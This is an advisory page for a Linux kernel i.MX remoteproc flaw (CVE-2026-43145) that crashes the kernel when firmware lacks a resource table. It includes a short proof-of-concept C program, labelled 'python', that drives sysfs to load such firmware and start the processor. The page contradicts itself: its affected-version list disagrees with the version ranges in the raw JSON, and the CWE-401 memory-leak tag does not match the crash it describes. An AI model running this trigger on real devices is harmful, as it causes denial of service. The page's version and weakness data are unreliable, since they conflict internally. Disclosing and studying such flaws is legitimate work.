CVE-2026-43145

Description

In the Linux kernel, the following vulnerability has been resolved: remoteproc: imx_rproc: Fix invalid loaded resource table detection imx_rproc_elf_find_loaded_rsc_table() may incorrectly report a loaded resource table even when the current firmware does not provide one. When the device tree contains a "rsc-table" entry, priv->rsc_table is non-NULL and denotes where a resource table would be located if one is present in memory. However, when the current firmware has no resource table, rproc->table_ptr is NULL. The function still returns priv->rsc_table, and the remoteproc core interprets this as a valid loaded resource table. Fix this by returning NULL from imx_rproc_elf_find_loaded_rsc_table() when there is no resource table for the current firmware (i.e. when rproc->table_ptr is NULL). This aligns the function's semantics with the remoteproc core: a loaded resource table is only reported when a valid table_ptr exists. With this change, starting firmware without a resource table no longer triggers a crash.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.10.218

Linux Kernel < 5.15.160

Linux Kernel < 6.1.93

Linux Kernel < 6.6.33

Linux Kernel < 6.9.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC Concept for CVE-2026-43145
 * This PoC demonstrates the trigger condition.
 * Requires an affected i.MX device and a firmware image without a resource table.
 */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

#define FIRMWARE_PATH "/path/to/firmware_without_rsc.elf"
#define RPROC_STATE_PATH "/sys/class/remoteproc/remoteproc0/state"
#define RPROC_FW_PATH "/sys/class/remoteproc/remoteproc0/firmware"

int main() {
    int fw_fd, state_fd;
    printf("[+] Attempting to trigger CVE-2026-43145...");

    // 1. Stop the remote processor
    state_fd = open(RPROC_STATE_PATH, O_WRONLY);
    if (state_fd > 0) {
        write(state_fd, "stop", 4);
        close(state_fd);
    }

    // 2. Load a firmware that does NOT contain a resource table
    // but the Device Tree expects one.
    fw_fd = open(RPROC_FW_PATH, O_WRONLY);
    if (fw_fd < 0) {
        perror("[-] Failed to open firmware sysfs");
        return 1;
    }
    write(fw_fd, FIRMWARE_PATH, sizeof(FIRMWARE_PATH));
    close(fw_fd);

    // 3. Start the remote processor
    state_fd = open(RPROC_STATE_PATH, O_WRONLY);
    write(state_fd, "start", 5);
    close(state_fd);

    printf("[+] Crash expected if kernel is vulnerable.");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43145
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43145
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43145/
[4] VulDB https://vuldb.com/cve/CVE-2026-43145
[5] https://git.kernel.org/stable/c/198c629bd03863591f3fbf5ce8ff974a33f13dc9
[6] https://git.kernel.org/stable/c/26aa5295010ffaebcf8f1991c53fa7cf2ee1b20d
[7] https://git.kernel.org/stable/c/500778df9e4c313190368908ff40c23948508e97
[8] https://git.kernel.org/stable/c/65379adf7d231c930572db45933ff4538f4c5128
[9] https://git.kernel.org/stable/c/91baf24d972ea3c04a75dd18821c03d223c0dbc0
[10] https://git.kernel.org/stable/c/9bd98d088f47153a81a6ec8162b4415c64aa7f39
[11] https://git.kernel.org/stable/c/fcec79b6a3649ae7b1f659267602ca402c240d6e

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43145", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:31.983", "lastModified": "2026-05-13T21:10:02.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: imx_rproc: Fix invalid loaded resource table detection\n\nimx_rproc_elf_find_loaded_rsc_table() may incorrectly report a loaded\nresource table even when the current firmware does not provide one.\n\nWhen the device tree contains a \"rsc-table\" entry, priv->rsc_table is\nnon-NULL and denotes where a resource table would be located if one is\npresent in memory. However, when the current firmware has no resource\ntable, rproc->table_ptr is NULL. The function still returns\npriv->rsc_table, and the remoteproc core interprets this as a valid loaded\nresource table.\n\nFix this by returning NULL from imx_rproc_elf_find_loaded_rsc_table() when\nthere is no resource table for the current firmware (i.e. when\nrproc->table_ptr is NULL). This aligns the function's semantics with the\nremoteproc core: a loaded resource table is only reported when a valid\ntable_ptr exists.\n\nWith this change, starting firmware without a resource table no longer\ntriggers a crash."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.168", "versionEndExcluding": "5.15.202", "matchCriteriaId": "F99C1353-35FC-4EA3-9F3F-12FBA3999A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.113", "versionEndExcluding": "6.1.165", "matchCriteriaId": "D459FB56-9DA7-40FC-88CB-1EF9D809A028"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.57", "versionEndExcluding": "6.6.128", "matchCriteriaId": "614164BB-328D-4E06-889A-B69E26B4299D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11.4", "versionEndExcluding": "6.12.75", "matchCriteriaId": "B0095F61-6451-4EEA-8A3C-B162067EE13A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/198c629bd03863591f3fbf5ce8ff974a33f13dc9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/26aa5295010ffaebcf8f1991c53fa7cf2ee1b20d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/500778df9e4c313190368908ff40c23948508e97", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/65379adf7d231c930572db45933ff4538f4c5128", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/91baf24d972ea3c04a75dd18821c03d223c0dbc0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9bd98d088f47153a81a6ec8162b4415c64aa7f39", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fcec79b6a3649ae7b1f659267602ca402c240d6e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}